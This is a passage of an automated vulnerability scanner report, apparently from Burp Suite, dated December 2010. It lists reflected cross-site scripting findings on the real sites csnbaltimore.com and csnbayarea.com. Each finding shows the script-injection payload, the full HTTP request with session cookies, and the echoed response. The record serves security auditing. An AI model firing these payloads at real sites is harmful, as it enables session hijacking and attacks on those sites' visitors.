<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/pagesd5a40<script>alert(1)</script>2fc595593ef/profiles"</strong>
...[SNIP]...

2.211. http://www.csnbaltimore.com/pages/profiles [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/profiles

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e2e26<script>alert(1)</script>12a624a60d0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pages/profilese2e26<script>alert(1)</script>12a624a60d0 HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:12 GMT
Content-Length: 791
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/404.html?p=/pages/profilese2e26<script>alert(1)</script>12a624a60d0"</strong>
...[SNIP]...

2.212. http://www.csnbaltimore.com/pages/profiles [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/profiles

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3344"><script>alert(1)</script>b44822d3468 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/profiles?c3344"><script>alert(1)</script>b44822d3468=1 HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 38937
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:11 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<!--

-->
<meta http-equiv="Content-Type" content="text/html; charset=U
...[SNIP]...
<input type=hidden name="c3344"><script>alert(1)</script>b44822d3468" id = "c3344">
...[SNIP]...

2.213. http://www.csnbaltimore.com/pages/video [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/video

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e981e<script>alert(1)</script>cbb3f841745 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagese981e<script>alert(1)</script>cbb3f841745/video HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:12 GMT
Content-Length: 769
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/pagese981e<script>alert(1)</script>cbb3f841745/video"</strong>
...[SNIP]...

2.214. http://www.csnbaltimore.com/pages/video [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/video

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 88f56<script>alert(1)</script>dd0e6f8cead was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pages/video88f56<script>alert(1)</script>dd0e6f8cead HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:13 GMT
Content-Length: 788
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/404.html?p=/pages/video88f56<script>alert(1)</script>dd0e6f8cead"</strong>
...[SNIP]...

2.215. http://www.csnbaltimore.com/pages/video [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/video

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bd0f"><script>alert(1)</script>b7a862edddf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/video?9bd0f"><script>alert(1)</script>b7a862edddf=1 HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 55931
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:12 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<!--
web5.platformic.com
-->
<meta http-equiv="Content-Type" content="t
...[SNIP]...
<input type=hidden name="9bd0f"><script>alert(1)</script>b7a862edddf" id = "9bd0f">
...[SNIP]...

2.216. http://www.csnbayarea.com/12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a36d6"><script>alert(1)</script>4cc38bef644 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12a36d6"><script>alert(1)</script>4cc38bef644/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 35402
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:19 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12a36d6"><script>alert(1)</script>4cc38bef644/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html">
...[SNIP]...

2.217. http://www.csnbayarea.com/12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c3af"><script>alert(1)</script>280925335e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/173c3af"><script>alert(1)</script>280925335e/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 35401
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:20 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/173c3af"><script>alert(1)</script>280925335e/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html">
...[SNIP]...

2.218. http://www.csnbayarea.com/12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90b9a"><script>alert(1)</script>5f8cf1335bb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/1090b9a"><script>alert(1)</script>5f8cf1335bb/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 35402
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:21 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17/1090b9a"><script>alert(1)</script>5f8cf1335bb/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html">
...[SNIP]...

2.219. http://www.csnbayarea.com/12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed61c"><script>alert(1)</script>1b63bb97bee was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Gutierrez-Denver-Raiders-matchups-to-wated61c"><script>alert(1)</script>1b63bb97bee/landing_gutierrez.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 35383
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:22 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17/10/Gutierrez-Denver-Raiders-matchups-to-wated61c"><script>alert(1)</script>1b63bb97bee/landing_gutierrez.html">
...[SNIP]...

2.220. http://www.csnbayarea.com/12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd3d0"><script>alert(1)</script>56354eb4635 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12cd3d0"><script>alert(1)</script>56354eb4635/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 41042
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:21 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12cd3d0"><script>alert(1)</script>56354eb4635/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html">
...[SNIP]...

2.221. http://www.csnbayarea.com/12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46335"><script>alert(1)</script>f110c8b6e2c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/1746335"><script>alert(1)</script>f110c8b6e2c/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 41042
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:22 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/1746335"><script>alert(1)</script>f110c8b6e2c/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html">
...[SNIP]...

2.222. http://www.csnbayarea.com/12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efabd"><script>alert(1)</script>31a0dd08c37 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10efabd"><script>alert(1)</script>31a0dd08c37/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 41042
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:24 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17/10efabd"><script>alert(1)</script>31a0dd08c37/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html">
...[SNIP]...

2.223. http://www.csnbayarea.com/12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c68e"><script>alert(1)</script>0e5f634afe3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Maiocco-Singletary-again-weighs-which-Sm3c68e"><script>alert(1)</script>0e5f634afe3/landing_maiocco_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 41023
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:25 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17/10/Maiocco-Singletary-again-weighs-which-Sm3c68e"><script>alert(1)</script>0e5f634afe3/landing_maiocco_v3.html">
...[SNIP]...

2.224. http://www.csnbayarea.com/12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2b00"><script>alert(1)</script>b3b513ae740 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12a2b00"><script>alert(1)</script>b3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 40245
Content-Type: text/html
Set-Cookie: PHPSESSID=8924002375011fa867e8db486718e42d; path=/
Expires: Sun, 19 Dec 2010 18:12:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:12:09 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12a2b00"><script>alert(1)</script>b3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html">
...[SNIP]...

2.225. http://www.csnbayarea.com/12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5969e"><script>alert(1)</script>618d21952d3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/175969e"><script>alert(1)</script>618d21952d3/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 40245
Content-Type: text/html
Set-Cookie: PHPSESSID=ffa30f218c9c484953facc9813c8bbd1; path=/
Expires: Sun, 19 Dec 2010 18:12:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:12:10 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/175969e"><script>alert(1)</script>618d21952d3/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html">
...[SNIP]...

2.226. http://www.csnbayarea.com/12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be9c1"><script>alert(1)</script>cc49bcb68a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10be9c1"><script>alert(1)</script>cc49bcb68a2/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 40245
Content-Type: text/html
Set-Cookie: PHPSESSID=5a4f36899cfc183f565f8c3eb2a13d16; path=/
Expires: Sun, 19 Dec 2010 18:12:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:12:11 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17/10be9c1"><script>alert(1)</script>cc49bcb68a2/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html">
...[SNIP]...

2.227. http://www.csnbayarea.com/12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85ab2"><script>alert(1)</script>c66f7de0b0d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

